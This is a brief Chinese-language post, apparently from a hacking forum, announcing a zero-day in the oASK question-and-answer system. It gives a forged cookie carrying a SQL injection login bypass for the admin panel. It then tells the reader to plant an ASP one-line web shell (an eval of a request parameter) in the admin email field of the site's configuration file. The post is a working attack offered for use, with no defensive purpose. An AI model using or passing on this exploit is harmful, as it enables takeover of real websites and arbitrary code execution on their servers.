发布一个oask问答系统的0day
最新版的哦,
用cookie浏览器强制修改cookie为
引用
oASK; ASPSESSIONIDSSDDBADB=HEJJFJNCEOFFIMOBJGHBPHJB; VSN=078349ef024074d5; oASKADM=ADMUPW=a' or '1'='1&ADMUNM=admin' or '1'='1
然后访问http://xxx.xxx.xxxx/admin/index.asp
后台配置文件,在管理员邮箱处写入一句话
a"%><%eval request("a")'